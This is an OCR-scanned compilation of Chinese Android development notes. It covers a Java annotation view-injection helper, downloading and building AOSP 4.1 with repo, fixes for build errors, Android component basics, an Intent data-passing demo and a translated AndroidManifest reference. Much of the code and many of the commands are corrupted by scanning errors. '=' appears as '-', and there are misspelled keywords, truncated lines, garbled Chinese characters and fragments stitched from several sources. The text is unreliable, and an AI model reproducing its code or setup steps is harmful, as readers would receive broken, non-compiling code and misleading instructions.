boolean clickable - viewInject.clickable(); 
if(viewId !- -1){ 
try 1 
field.setAccessible(true); 
field.set(object, sourceView.findViewById(viewId)); 
if(clickable == true){ 
sourceView.findViewById(viewId).setOnClickListener((View.O 
nClickListener) (object)); 


// 直接 使 用 Activity 作 为 事件 监听 器 


} catch (Exception e) { 
e.printStackTrace(); 


} 
} 
} 
} 
} 
private static void inJectContentView(Activity activity){ 
Class<? extends Activity» activityClass = activity.getClass(); 
ContentView contentView = activityClass.getAnnotation(ContentView.class); 
if(contentView != null)f{ 
int layoutId = contentView.id(); 
y a 
Method method = activityClass.getMethod("setContentView", int.class); 
method.invoke(activity, layoutId); 
) catch (Exception e) { 
e.printStackTrace(); 
j 
} 
} 


public static void inJect(Activity activity){ 
inJectContentView(activity); 
injectViews(activity, activity.getWindow().getDecorView()); 


原理 就 是 在 AnnotateUtils 通 过 传 入 的 Object 对 象 获得 在 类 中 注解 了 的 字段 ， 方 法 以 及 类 本 身 ， 
执行 对 应 的 操作 。 


Reference 


Java 反射 机 制 到 Android 的 注解 


Android 注 解 与 反射 机 制 
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Android 开 发 基础 


Android 源码 下 载 和 编译 


Android Jelly Bean(Android 4.1) 的 编译 依赖 Sun JDK 1.6， 由 于 Ubuntu 默认 使 用 Open JDK * 
所 以 需要 首先 安装 JDK1.6。 


安装 JDK 


首先 从 oracle 下 载 JDK1.6， 得 到 文件 jdk-6u45-linux-x64.bin 运行 直接 运行 解 包 ， 得 到 文件 夹 
jdk1.6.0 45» 


设置 环境 变量 ， 编 辑 文件 gedit /etc/profile 


export JAVA HOME-/home/monkey/Documents/jdk1.6.0 45 
export JRE HOME-$(JAVA HOMEj/jre 

export CLASSPATH=. :${JAVA_HOME}/1lib:${JRE_HOME}/lib 
export PATH=$PATH:${JAVA_HOME}/bin:${JRE_HOME}/bin 


安装 依赖 软件 包 


sudo apt-get install git-core gnupg flex bison gperf build-essential zip curl zlibig-dev g! 


下 载 Android 代 码 


// 建 立 repo 工 作 目 录 

mkdir ~/bin 

PATH=~/bin: $PATH 

// 下 载 repo 脚 本 

$ curl https://storage.googleapis.com/git-repo-downloads/repo > ~/bin/repo 
$ chmod a+x ~/bin/repo 

// 建 立 Android 源 码 目 录 

mkdir -p ~/android/jellybean 

cd ~/android/jellybean 

// 初 始 化 repo 

repo init -u https://android.googlesource.com/platform/manifest -b android-4.1.1_r3 
// 查 看 分 支 情况 

git ls-remote --tags https://android.googlesource.com/platform/manifest 

// 下 载 Android 源 代码 

repo Sync 


下 载 指定 模块 源码 


repo manifest -0 - 


其 中 ，name 表 示 项 目 模块 名 称 以 及 在 源码 服务 器 上 的 相对 路 径 ，path 表 示 项 目的 本 地 路 径 。 


repo manifest -o - 命令 读 取 的 是 本 地 源码 目录 (~/android/jellybean) 下 
的 .repo/manifest/default/xml 文 件 。 
知道 了 有 哪些 项 目 可 以 单独 下 载 ， 只 要 将 项 目 模块 名 指定 给 repo sync 即 可 。 


repo Sync platfoem/system/core 


TFT Android Linux Kernel? 23 
Kernel 部 分 的 源码 没有 采用 repo 工 具 管 理 ， 可 以 直接 通过 git 下 载 。 


cd ~/android/jellybean 
mkdir kernel 
cd kernel 


下 载 通用 版 ， 其 余 是 针对 特定 处 理 器 的 版 本 ， 执 行 第 一 条 指令 即 可 。 


git clone https://android.googlesource.com/kernel/common. git 
git clone https://android.googlesource.com/kernel/goldfish. git 
git clone https://android.googlesource.com/kernel/msm. git 

git clone https://android.googlesource.com/kernel/omap. git 

git clone https://android.googlesource.com/kernel/samsung.git 
git clone https://android.googlesource.com/kernel/tegra.git 


& T Android JellyBean 使 用 的 是 Linux 3.0 内 核 ， 还 需要 切换 到 Kernel 3.04 X ° 


cd common 
git branch -a 
git checkout remotes/origin/Android-3.0 


2 it Android LE AARY 


导入 预 设 脚本 : 


. build/envsetup.sh 或 者 
source build/envsetup.sh 


指定 产品 名 和 编译 变量 


lunch 
//ikitfull-eng 模拟 器 设备 


编译 源码 : 
make -j8 


Mac 环 境 配置 : 


hdiutil create -type SPARSE -fs 'Case-sensitive Journaled HFS+' -Size 40g ~/android.dm 


g 
hdiutil resize -size <new-size-you-want>g ~/android.dmg.sparseimage 
hdiutil attach ~/android.dmg -mountpoint /Volumes/android 


编译 指定 模块 源码 


e make 模块 名 
e mm 来 自 于 envsetup.sh 脚 本 中 注册 的 函数 
e mmm 来 自 于 envsetup.sh 脚 本 中 注册 的 函数 


make 模块 名 


适合 第 一 次 编译 ， 会 把 依赖 块 一 并 编译 。 编译 应 用 层 源码 ， 查 看 Android.mk 文 件 的 
LOCAL PACKAGE NAME ° 


cat packages/apps/Phone/Android.mk 
LOCAL PACKAGE NAME :- Phone 
make Phone 
编译 框架 层 和 系统 运行 库 源码 ， 查 看 LOCAL_ MODULE € € : 
find frameworks -name Android.mk 
cat frameworks/base/cmds/app_process/Android.mk 


LOCAL_MODULE := app_process 


make app_process 


mmm 命 令 


用 于 在 源码 根 目 录 编 译 指定 模块 ， 参 数 为 模块 的 相对 路 径 。 只 能 在 第 一 编译 后 使 用 ， 比 如 要 
编译 Phone 部 分 源码 : 


mmm packages/apps/phone 
mm 命令 
用 于 在 模块 根 目录 编译 这 个 模块 ， 只 能 在 第 一 次 编译 后 使 用 。 上 比如 要 编译 Phone 部 分 源码 : 


cd packages/apps/phone 
mm 


mmm 和 mm 命令 必须 在 执行 . build/envsetup.sh 之 后 才能 使 用 ， 并 且 只 编译 发 生变 化 的 文件 ， 
如 果 需 要 编译 模块 的 所 有 文件 ， 需 要 加 -B。 如 : mm -B 


Android 源码 结构 


包 名 
abi 
bionic 
boottable 
build 


cts 


dalvik 
development 
device 


docs 


external 


frameworks 
gdk 

hardware 
libcore 
libnativehelper 
Makefile 

ndk 


out 


packages 
prebuilt 


sdk 


system 


二 进 制 兼容 性 检查 

Bionic C 库 实现 代码 

启动 引导 程序 的 源码 ， 包 含 bootloader ，diskinstall 和 recovery 
编译 系统 ， 包 含 各 种 make 和 shell 脚 本 


兼容 性 检测 源码 ，Android 手 机 如 果 需 要 Google 认 证 ， 就 需要 通过 
Google 的 兼容 性 检测 ， 目 的 是 确保 该 手机 系统 具备 标准 的 SDK API 接 
E 


Dalvik 庶 拟 机 源码 

Android 开 发 所 使 用 的 一 些 配 置 文件 

不 同 厂商 设备 相关 的 编译 脚本 ， 和 包含 三 星 和 摩托 罗拉 等 
source.android.com 文 档 


Android 依 赖 的 扩展 库 ， 和 包括 bluetooth、skia ^ sqlite ^ webkit ^ 
wpa_supplicant 等 功能 库 和 一 些 工具 库 ， 如 oprofile 用 于 JNI 层 的 性 能 调 
试 。 系 统 运行 库 层 大 部 分 代码 位 于 这 里 


框架 层 源 码 ， 应 用 框架 层 位 于 这 里 

提供 NDK build 的 封装 脚本 

硬件 抽象 层 相 关 源 码 

核心 Java 库 。Android2.3 以 前 位 于 /dalvik/libcore 目 录 下 
JNI 的 一 些 头 文件 

编译 入 口 ， 指 向 /build/main.mk 

NDK(Native Development Kit) 开 发 环境 相关 源码 


编译 输出 目录 ， 编 译 后 的 所 有 输出 都 在 这 个 目录 ， 分 为 主机 部 分 和 目标 
机 部 分 


包含 各 种 内 置 应 用 程序 、 内 容 提 供 器 、 输 入 法 等 。 应 用 层 开 发 主要 集中 
在 这 部 分 
编译 所 需 的 程序 文件 ， 主 要 包含 不 同 平台 下 的 ARM 编 译 器 


编译 SDK 工 具 所 需 的 文件 ， 包 含 hierachyviewer、eclipse 插 件 、 
emulator、raceview 等 主要 工具 


Linux 所 需 的 一 些 系 统 工具 程序 ， 比 如 adb、debuggerd ^ fastboot ^ 
logcat 等 。 


编译 遇 到 的 问题 


出 现 错误 : 


make: *** Waiting for unfinished jobs.... 

make: *** [out/host/linux-x86/0bj/STATIC LIBRARIES/libhost intermediates/CopyFile.o] E 
rror 127 

host C++: libandroidfw <= frameworks/base/libs/androidfw/Asset.cpp 
prebuilts/tools/gcc-sdk/gt+: line 40: prebuilts/tools/gcc-sdk/../../gcc/linux-x86/host 
/1686-linux-glibc2.7-4.6/bin/i686-linux-g++: No such file or directory 

make: *** [out/host/linux-x86/0bj/STATIC LIBRARIES/libandroidfw intermediates/Asset.o] 
Error 127 

Note: Some input files use or override a deprecated API. 

Note: Recompile with -Xlint:deprecation for details. 


解决 方案 : 

sudo apt-get install gcc-multilib 

出 现 错误 : 
/home/monkey/android/4.1.1/prebuilts/gcc/linux-x86/host/i686-linux-glibc2.7-4.6/bin/../lib. 
解决 方案 : 

sudo apt-get install zlib1g:i386 


出 现 错误 : 


gcc: error trying to exec 'cciplus': execvp: No such file or directory 
解决 方案 : 


gcc 和 g++ 版 本 不 匹配 

$ sudo apt-get install gcc-4.4 g++-4.4 

$ sudo rm -f /usr/bin/gcc /usr/bin/g++ 

$ sudo 1n -s /usr/bin/gcc-4.4 /usr/bin/gcc 
$ sudo ln -s /usr/bin/g++-4.4 /usr/bin/g++ 


出 现 错误 : 


libstdc++.so.6: cannot open shared object file: No such file or directory 


解决 方案 : 
sudo apt-get install lib32stdc++6 


出 现 错误 : 
Can't locate Switch.pm in @INC (you may need to install the Switch module) 


解决 方案 : 
sudo apt-get install libswitch-perl 


出 现 错误 : 


/bin/bash: xmllint: command not found 


解决 方案 : 
sudo apt-get install libxml2-utils 


Reference 


http://www.alonemonkey.com/2016/05/03/android-source-compile/ 
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一 、 基 础 知识 


10. 


11. 


12. 


13. 


14. 


. Android SDK/NDK : Android SDK 包 含 了 一 个 调试 器 、 库 、 一 个 模拟 器 、 文 档 、 实 例 代 


码 和 教程 。NDK 是 支持 native app 开发 所 需 的 一 套 支持 ， 即 使 用 c/c++ 开发 。 
ADT: 用 于 Eclipse 的 Android 开 发 工具 (Android Development Tools > ADT) 插件 是 对 
Eclipse IDE 的 扩展 ， 用 以 支持 android 应 用 程序 的 创建 和 调试 。 

AVD(Android Virtual Device): AVD 是 一 个 模拟 器 实例 ， 可 以 用 来 模拟 一 个 真实 的 设备 。 
Activity: Activity( 活 动 ) 是 一 个 包含 应 用 程序 的 用 户 界 面 窗口 ， 一 个 应 用 程序 可 以 有 和 零 个 
或 多 个 活动 。Activity 的 根本 ， 所 有 程序 都 运行 在 Activity 之 中 ，Activity 具 有 自 
己 的 生命 周期 ， 由 系统 控制 生命 周期 ， 程 序 无 法 改变 。 

Intent : Intent 是 android 中 = 种 消息 通信 机 制 (媒介 ) ， 专 门 提 供 组 件 互相 调用 的 相关 
信息 ， 实 现 调 用 者 和 被 调用 的 解 耦 。 

È AIntent : 指定 了 component 属 性 的 intent (调用 setComponent) 或 者 

setClass (context: class) 来 指定 ) 。 通 过 指定 具体 的 组 件 类 ， 调 用 应 用 启动 对 应 的 组 
件 。 

K XIntent : 没有 指定 component 属 性 的 Intent。 这 些 Intent 需 要 包含 足够 的 信息 ， 这 些 系 
统 才 能 根据 这 些 信 息 ， 在 所 有 的 可 用 组 件 中 ， 确 定 满足 此 Intent 的 组 件 。 


& 


Toast: Toast 是 android 中 用 来 显示 信息 的 一 种 机 制 ， 和 Dialog 不 一 样 的 是 Toast 是 没有 焦点 
的 ， 而 且 Toast 显 示 的 时 间 有 限 ， 过 一 定时 间 就 会 自动 消失 。 


Android 操作 系统 : Android 是 一 种 基于 Linux 的 开源 的 收集 操作 系统 。 
APK Android Package 的 缩写 ， 即 Android 安 装 包 (anapk) ° APK 文 件 其 实 是 zip 格 
式 ， 但 后 级 名 修改 为 APK， 通 过 UnZip 解 压 后 ， 可 以 看 到 Dex 文 件 ，Dex 是 Dalvik VM 
executes 的 全 称 ， 即 Android Dalvik 执 行程 序 ， 并 非 Java 的 字 节 码 而 是 Dalvik 的 字 节 码 。 
但 如 AndroidManifest.xml 等 文件 是 查看 不 到 原 有 内 容 的 ， 需 要 用 apktool 等 工具 反 编 译 。 
Android 四 大 组 件 〈Activity，Service，Broadcast Receiver, Content Provider ) 
Activity: 应 用 程序 中 ， 一 个 Activity 通 常 是 一 个 单独 的 屏幕 ， 显示 一 些 控件 也 可 
以 监听 并 处 理 用 户 的 事件 做 出 响应 。Activity 之 间 通 过 Intent 进 行 通信 ， 在 Intent 的 描述 结 
构 中 ， 有 两 个 重要 的 部 分 : 动作 和 动作 对 应 的 数据 。 
Broadcast Receiver: 广 播 接收 者 (BroadcastReceiver) 用 于 接收 广播 Intent， 广 播 Intent 
的 发 送 是 通过 调用 Context.sendBroadCast()、Context.sendOrderedBroadcast()、 
Context.sendStickyBroadcast() 来 实现 的 ，BroadcastReceiver 广泛 应 用 于 应 用 间 的 交 
通常 一 个 广播 Intent 可 以 被 订阅 了 此 Intent 的 多 个 广播 接收 者 所 接收 (就 像 监 的 收音 机 一 
A) 。 
广播 (Broadcas) 是 一 种 广泛 运用 的 应 用 程序 之 间 的 传输 消息 的 机 制 。 而 广播 接收 者 
(BroadcastReceiver) 是 对 发 送出 来 的 广播 进行 过 滤 并 接收 响应 的 一 类 组 件 。 
BroadcastReceiver 生 命 周期 : 每 次 广播 到 来 时 ， 会 重新 创建 BroadcastReceiver 对 象 ， 并 
调用 onReceive() 方 法 ， 执 行 完 以 后 ， 该 对 象 即 被 销毁 。 当 onReceive() 方 法 在 10s 内 没有 


15. 


16. 


17. 


18. 


执行 完毕 ， 就 会 导致 ANR。 如 果 需 要 执行 长 任务 ， 那 么 就 必须 要 使 用 Service。 另 外 在 

onReceive 中 使 用 线程 是 很 危险 的 事情 。 因 为 线程 没有 执行 完 ，BroadcastReceiver 就 挂 

了 。 

iz : ANR (Application No Response) : 程序 无 响应 的 错误 信息 。 

Service : 和 Activity 属 于 同一 级 别 的 组 件 ， 不 能 自己 运行 只 能 后 台 运 行 ， 并 且 可 以 和 其 他 

组 件 进行 交互 。Service 可 以 在 很 多 场合 的 应 用 中 使 用 ， 比 如 播放 多 媒体 的 时 候 启 动 了 其 

他 Activity， 这 个 时 候 程序 要 在 后 台 继 续 播 放 。 

一 个 Service 是 一 段 长 生命 周期 的 ， 没 有 用 户 界 面 的 程序 ， 可 以 用 来 开发 如 监控 类 程序 。 

Content Provider : ContentProvider 在 android 中 的 作用 是 对 外 共享 数据 ， 也 就 是 说 你 可 
通过 ContentProvider 把 应 用 中 的 数据 共享 给 其 他 应 用 访问 ， 其 他 应 用 可 以 通过 

ContentProvider 对 你 应 用 的 数据 进行 增删 改 查 。 关于 共享 数据 ， 可 以 使 用 文件 操作 模 

式 ， 通 过 指定 文件 的 操作 模式 为 Context.MODEWORLDREADABLE 或 

Context.MODEWORLDWRITEABLE 同 样 也 可 以 对 外 共享 数据 ， 但 是 使 用 文件 共享 数据 

存在 数据 访问 方式 不 统一 的 问题 。 而 Content Provider 则 对 外 暴露 了 统一 的 接口 ， 每 个 应 

用 程序 都 可 以 通过 统一 的 接口 操作 数据 。 

常用 的 布局 管理 器 : 

布局 管理 器 一 般 有 四 种 : 

pines ayoni Ep pru (RU) > PAK-F (horizontal) 和 垂直 (vertical) 两 

种 ， 只 能 进行 单行 布局 。 

FrameLayout: 所 有 组 件 放 在 左上 角 ， 一 个 覆盖 一 个 。 

TableLayout: 任 意 行 和 列 的 表格 布局 管理 器 ， 其 中 TableRow 代 表 一 行 ， 可 以 向 行 中 增加 

组 件 。 

RelativeLayout : 相对 布局 管理 器 ， 根 据 最 近 一 个 组 件 或 者 顶层 父 组 件 来 确定 下 一 个 组 件 

的 位 置 。 

Android 应 用 程序 是 用 Java 语 言 写 的 ， unde ei 用 程序 所 需 

要 的 所 有 数据 、 资 源 文件 打包 成 Android 包 ， 及 后 组 为 .apk 的 压缩 文件 ， 这 个 文件 时 发 布 

应 用 程序 和 在 移动 设备 上 安装 应 用 程序 的 媒介 ， 是 用 户 下 载 到 他 们 设备 上 的 文件 。 一 

个 .apk 文 件 中 的 所 有 代码 属于 一 个 应 用 程序 。 


19. Android 体 系 结 构 : 
官网 体系 结构 图 : 
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Android 从 上 到 下 分 为 4 层 : Android E M Æ > Android. & FIER > Android & A 24TA > 
Linux A 1A Æ » 


20. 每 一 个 Android 应 用 程序 都 在 自己 的 进程 中 运行 ， 都 拥有 一 个 独立 的 Dalvik 虚 拟 机 实例 。 
Dalvik 被 设计 成 一 个 设备 可 以 同时 高 效 的 运行 多 个 虚拟 系统 。Dalvik 虚 拟 机 执行 (.dex) 
的 Dalvik 可 执行 文件 ， 该 格式 文件 针对 小 内 存 使 用 做 了 优化 。 同 时 虚拟 机 是 基于 寄存 器 
的 ， 所 有 的 类 都 经 由 Java 编 译 器 编译 ， 然 后 .class 通 过 SDK 中 的 "dx" 工 具 转 化 成 .dex 格 式 
由 虚拟 机 执行 。 


21. Android Activity 生命 周期 : 
生命 周期 图 : 


| oncreatay | 
User na LE. | 
back to the 














E activity 
comes to the 
foreground 
jgan activity og 
in front of the activity | 








The activity 
Other applications comes to the 
need memory foreground 





The activity is no longer visible . 











ResumedX &: 

在 这 种 状态 下 ， 该 Activity 在 前 台 运 行 ， 用 户 可 以 与 它 进 行 交 互 。 (有 时 也 简称 为 "running" 状 
态 。) 

Paused 状 态 : 

在 这 种 状态 下 ， 该 Activity 被 部 分 遮蔽 (被 其 他 在 前 台 的 半 透 明 或 不 覆盖 整个 屏幕 的 活动 遮 
住 ) 。 此 状态 不 接受 用 户 输入 ， 并 且 不 能 执行 任何 代码 。 

Stopped 状 态 : 

在 这 种 状态 下 ， 该 活动 是 完全 隐藏 ， 不 可 见 的 ， 可 视 为 存在 于 后 台 。 虽 然 停 止 ， 活 动 实例 和 
所 有 成 员 变 量 如 状态 信息 将 被 保留 ， 但 不 能 执行 任何 代码 。 


(1) 当 程序 第 一 次 运行 时 用 户 会 看 到 主 Activity， 主 Activity 可 以 通过 启动 其 他 的 Activity 进 行 相关 
操作 。 

(2) 当 局 动 其 他 的 Activity 时 当前 的 Activity 将 会 停止 ， 新 的 Activity 将 会 压 入 栈 中 ， 同 时 获取 用 户 
焦点 ， 这 时 就 可 在 这 个 Activity 上 操作 了 。 

(3) 根 据 栈 的 先进 后 出 原则 ， 当 用 户 按 Back 键 时 ， 当 前 这 个 Activity 销 毁 ， 前 一 个 Activity 重 新 恢 
复 。 


1. Activity 之 间 传 递 数据 的 几 种 方式 : 
(1) 将 数据 封装 在 Intent 变 量 中 。 (使 用 Intent 传 递 对 象 有 一 个 局 限 性 ， 就 是 不 能 传递 不 能 
序列 化 的 对 象 ) 
(2) 使 用 系统 的 剪 切 板 来 传递 数据 。 
获取 剪 切 板 的 代码 如 下 : 
ClipboardManager clipboardManager = (ClipboardManager) getSystemService(Context.CLIPBC 
(3) 使 用 全 局 变量 来 传递 数据 : 
例如 : 
/myApp 是 一 个 应 用 级 别 的 全 局 对 象 ， 在 应 用 的 任何 地 方 都 可 以 调用 这 个 对 象 。 
MyApp myApp = (MyApp)getApplication(); 
(4) 使 用 静态 s 目标 的 Activity 中 ， 声 明 公 开 的 静态 属性 ， 在 调用 的 
Activity 针 对 这 个 属性 进行 赋值 ， 来 进行 数据 的 传递 。 
2. MActivity P 3& sed 
(1) startActivity(): 用 于 启动 意图 。 
(2) startActivityForResult(): 启 动 意图 并 获取 返回 结果 。 在 等 待 返 回 结 果 的 Activity 中 必须 
实现 onActivityResult 方 法 。 
3. finish 方 法 用 来 结束 Activity 的 生命 周期 。 


` 实现 DEMO 


1. 利 用 Intent 在 两 个 Activity 之 问 传递 数据 : 
关键 代码 在 源码 包 添 加 调用 者 和 被 调用 者 的 Activity java € : 


调用 者 Main.java : 


@Override 
public class Main extends Activity { 


private Button button; 
@Override 
protected void onCreate(Bundle savedInstanceState) { 
super .onCreate(savedInstanceState) ; 
// 加 载 布局 文件 
setContentView(R.layout.main); 
button - (Button)this.findViewById(R.id.button); 
button.setOnClickListener(new View.OnClickListener() { 


QOverride 
public void onClick(View v) { 
Intent intent - new Intent(Main.this,OtherActivity.class); 
// 在 意图 中 传递 数据 
intent ,putEXxtra("name"，" 张 三" ) ; 
intent.putExtra("age", 123); 
intent.putExtra("address", "3b%"); 
// 启 动 意图 
startActivity(intent); 


3); 
} 


@Override 

public boolean onCreateOptionsMenu(Menu menu) { 
// Inflate the menu; this adds items to the action bar if it is present. 
getMenuInflater().inflate(R.menu.main, menu); 
returm true; 


被 调用 者 OtherActivity.java : 


public class OtherActivity extends Activity { 
private TextView textView; 


public OtherActivity() { 


} 


@Override 

protected void onCreate(Bundle savedInstanceState) { 
// TODO Auto-generated method stub 
super .onCreate(savedInstanceState) ; 
setContentView(R.layout.other); 
textView - (TextView)this.findViewById(R.id.msg); 
Intent intent - getIntent(); 
int age = intent.getIntExtra("age", 0); 
String name - intent.getStringExtra("name"); 
String address - intent.getStringExtra("address"); 


textView.setText("age -->>"+age+"\n"+"name-->>"+name+"\n addresss-->>"+address 


) 


在 res 的 layout 目 录 下 配置 两 个 布局 配置 文件 : 


主 Activity 的 配置 文件 main.xml 中 添加 : 


Android 开 发 基础 知识 


«Button android:id="@+id/button" android:layout width-"match parent" 
android:layout height-"wrap content" 
android:text=" 测 试 Intent 传 递 数据 " /> 


被 调用 的 Activity 中 添加 : 


<TextView android:id="@+id/msg" 
android: layout_width="fill_parent" 
android: layout_height="fill_parent"/> 


40 


在 Manifest.xml 程 序 清单 中 添加 Activity 的 配置 。 
全 部 配置 完毕 后 就 完成 了 一 个 Activity 通 过 Intent 传 递 信息 到 另 一 个 Activity 的 过 程 。 
调用 者 : 

String name = intent.getStringExt 
address = intent. 


String getString 
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被 调用 者 : 


String name = intent.getStringExtra(" 


ringExtr 
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Hardware Keyboard 
Use your physical keyboard to provide input 


在 Mainifest xm 程序 清单 中 添加 Activity 的 配置 。 全 - 关 卫 E 


android:id 


这 是 视图 的 唯一 标识 符 。 可 以 在 程序 代码 中 通过 该 标识 符 引用 对 象 ， 例 如 对 这 个 对 象 进 行 读 
和 修改 的 操作 。 

当 需 要 从 XML 里 引用 资源 对 象 时 ， 必 须 使 用 @ 符号 。 紧 随 @ 之 后 的 是 资源 的 类 型 (这 里 是 
id) ， 然 后 是 资源 的 名 字 (这 里 使 用 的 是 button/msg) 。+ 号 只 在 第 一 次 定义 一 个 资源 ID 的 
时 候 需 要 ， 它 是 告诉 SDK 一 一 此 资源 ID 需要 被 创建 。 在 应 用 程序 被 编译 之 后 ，SDK 就 可 以 
直接 使 用 这 个 ID © 


Reference 


http://blog.csdn.net/lantian0802/article/details/21811545 


应 用 清单 


每 个 应 用 的 根 目录 中 都 必须 包含 一 个 AndroidManifest.xml 文件 〈( 且 文件 名 精确 无 误 ) 。 清单 
文件 向 Android 系统 提供 应 用 的 必要 信息 ， 系 统 必 须 具 有 这 些 信息 方 可 运行 应 用 的 任何 代 


AU o 


此 外 ， 清 单 文件 还 可 执行 以 下 操作 : 


为 应 用 的 Java 软件 包 命名 。 软 件 包 名 称 充当 应 用 的 唯一 标识 符 。 
描述 应 用 的 各 个 组 件 ， 包 括 构 成 应 用 的 Activity、 服 务 、 广 播 接收 器 和 内 容 提 供 程序 。 它 
还 为 实现 每 个 组 件 的 类 命名 并 发 布 其 功能 ， 例 如 它们 可 以 处 理 的 Intent 消息 。 这 些 声明 
向 Android 系统 告知 有 关 组 件 以 及 可 以 启动 这 些 组 件 的 条 件 的 信息 。 
确定 托管 应 用 组 件 的 进程 。 
声明 应 用 必须 具备 哪些 权限 才能 访问 API 中 受 保护 的 部 分 并 与 其 他 应 用 交互 。 还 声明 其 
Am SRAM IRL EMER EH HL Inctumontlon 2 > ER TAS Meh 
时 提供 分 析 和 其 他 信息 。 这 些 声明 只 会 在 应 用 处 于 开发 阶段 时 出 现在 清单 中 ， 在 应 用 发 
布 之 前 将 移 除 。 
声明 应 用 所 需 的 最 低 Android API 级 别 
ee e A 
kera Chromebook 上 和 运行 的 Android 应 用 时 ， 要 考虑 一 些 重 要 的 硬件 和 和 软 
is 能 限制 。 如 需 了 解 详细 信息 ， 请 参阅 Chromebook 的 应 用 清单 兼容 性 文档 。 


清单 文件 结构 


下 面 的 代码 段 显示 了 清单 文件 的 通用 结构 及 其 可 包含 的 每 个 元 素 。 每 个 元 素 及 其 所 有 属性 
部 记录 在 一 个 单独 的 文件 中 。 


提示 : 要 查看 本 文档 提 及 的 任何 元 素 的 详细 信息 ， 只 需 点 按 元 素 名 称 。 


下 面 是 清单 文件 的 示例 : 


<?xml version="1.0" encoding="utf-8"?> 
<manifest> 


<uses-permission /> 
<permission /> 
<permission-tree /> 
<permission-group /> 
<instrumentation /> 
<uses-sdk /> 
<uses-configuration /> 
<uses-feature /> 
<supports-screens /> 
<compatible-screens /> 
<supports-gl-texture /> 


<application> 


<activity> 
«intent-filter» 
«action /» 
«category /» 
«data /» 
</intent-filter> 
<meta-data /> 
</activity> 


<activity-alias> 
<intent-filter> . . . </intent-filter> 
«meta-data /» 

«/activity-alias» 


«service» 
«intent-filter» . . . </intent-filter> 
«meta-data/» 

«/service» 


«receiver» 
«intent-filter» . . . </intent-filter> 
«meta-data /» 

«/receiver» 


«provider» 
«grant-uri-permission /» 
«meta-data /» 
«path-permission /» 

</provider> 

<uses-library /> 


</application> 


</manifest> 


以 下 列表 包含 可 出 现在 清单 文件 中 的 所 有 元 素 ， 按 字母 顺序 列 出 : 


<action> 
<activity> 
<activity-alias> 
<application> 
<category> 

<data> 

<grant -uri-permission> 
<instrumentation> 
<intent-filter> 
<manifest> 
<meta-data> 
<permission> 
<permission-group> 
<permission-tree> 
<provider> 
<receiver> 
<service> 
<supports-screens> 
<uses-configuration> 
<uses-feature> 
<uses-library> 
<uses-permission> 
«uses-sdk» 


io: 这 些 是 仅 有 的 合法 元 素 - 您 无 法 添加 自己 的 元 素 或 属性 。 


本 节 描 述 普遍 适用 于 清单 文件 中 所 有 元 素 和 属性 的 约定 和 规则 。 


只 有 <manifest> 和 <application> 元 素 是 必需 的 ， 它 们 都 必须 存在 并 且 只 能 出 现 一 次 。 其 
他 大 部 分 元 素 可 以 出 现 多 次 或 者 根本 不 。 但 清 2: s 中 某 些 元 素 才 有 
用 。 如 果 一 个 元 素 包 含 某 些 内 容 ， 也 就 包含 其 他 元 素 。 所 有 值 均 通 生 进 行 设置 ， 而 不 是 
通过 元 素 内 的 字符 数据 设置 。 


同一 级 别 的 元 素 通常 Uh ee > «activity» ^ «provider» 和 «service» 元 素 可 
以 按 任何 顺序 混合 在 一 起 。 这 条 规则 有 两 个 主要 例外 : 


<activity-alias> 元 素 必 须 跟 在 别名 所 指 的 <activity> 之 后 。 <application> 元 素 必 须 
是 <manifest> 元 素 内 最 后 一 个 元 素 。 换 言 之 ， </manifest> 结束 标记 必须 紧 接 在 
</application> 结束 标记 后 


属性 


从 某 种 意义 上 说 ， 所 有 属性 都 是 可 选 的 。 但 是 ， 必 须 指定 某 些 属性 ， 元 素 才 可 实现 其 目的 。 
请 使 用 本 文档 作为 参考 。 对 于 丨 正 可 选 的 属性 ， 它 将 指定 默认 值 或 声明 缺乏 规范 时 将 执行 何 
种 操作 。 除 了 根 <manifest> 元 素 的 一 些 属 性 外 ， 所 有 属性 名 称 均 以 android: 前 级 开头 。 例 


如 ，android:alwaysRetainTaskState。 由 于 该 前 组 是 通用 的 ， 因 此 在 按 名 称 引 用 属性 时 ， 本 
文档 通 常会 将 其 7N 忽略 。 


声明 类 名 


许多 元 素 对 应 于 Java 对 象 ， 包 括 应 用 本 身 的 元 素 ( <application> 元 素 ) 及 其 主要 组 件 : 
Activity ( «activity» )、 服 务 ( «service» ) 广播 接 收 器 ( «receiver» ) 以 及 内 容 提供 程序 
( «provider» )。 如 果 按 照 您 针对 组 件 类 (Activity ` Service 和 
BroadcastReceiverContentProvider) 几乎 一 直 采 用 的 方式 来 定义 子 类 ， 则 该 子 类 需 通 过 
name 属性 来 声明 。 该 名 称 必须 包含 完整 的 软件 包 名 称 。 例 如 ，Service 子 类 可 能 会 声明 如 
"T: 


<manifest ıı- > 
<application 7. = > 
«service android:name-"com.example.project.SecretService" . . . > 


«/service» 


«/application» 
«/manifest» 


但 是 ， 如 果 字 符 串 的 第 一 个 字符 是 句点 ， 则 应 用 的 软件 包 名 称 (如 «manifest» 元 素 的 
package 属性 所 指定 ) 将 附加 到 该 字符 串 。 以 下 赋值 与 上 述 方法 相同 : 


«manifest package="com.example.project" . . .> 
«application . > 
«service android:name-".SecretService" . . .> 


«/service» 


«/application» 
«/manifest» 


358 32 2E 4 FH. > Android 系统 会 创建 已 命名 子 类 的 实例 。 如 果 未 指定 子 类 ， 则 会 创建 基 类 的 实 
例 o 
多 个 值 


如 果 可 以 指定 多 个 值 ， 则 几乎 总 是 在 重复 此 元 素 ， 而 不 是 列 出 单个 元 素 内 的 多 个 值 。 例 如 ， 
intent 过 eee i 多 个 操作 : 


«intent-filter . . .> 
«action android:name="android.intent.action.EDIT" /> 
«action android:name-z"android.intent.action.INSERT" /> 
«action android:name="android.intent.action.DELETE" /> 


</intent-filter> 


资源 值 


某 些 属性 的 值 可 以 显示 给 用 户 ， 例 如 ，Activity 的 标签 和 图 标 。 这 些 属性 的 值 应 该 本 地 化 ， 并 
通过 资源 或 主题 进行 设置 。 资 源 值 用 以 下 格式 表示 : 


@[<i>package</i>:]<i>type</i>/<i>name</i> 


Pu 
sy 
Zi 
Án 
Des 
2 
v 
i 
ay 
te 
Ss 


如 果 资 源 与 应 用 在 同一 个 软件 包 中 ， 可 以 省 略 软件 包 名 称 。 类 型 
可 绘制 对 象 ， 名 称 是 标识 特定 资源 的 名 称 。 下 面 是 示例 : 


«activity android:icon="@drawable/smallPic" . . .> 


主题 中 的 值 用 类 似 的 方法 表示 ， 但 是 以 3 开头 ， 而 不 是 以 @ 开头: 


?[<i>package</i>: ]<i>type</i>/<i>name</i> 


字符 串 值 
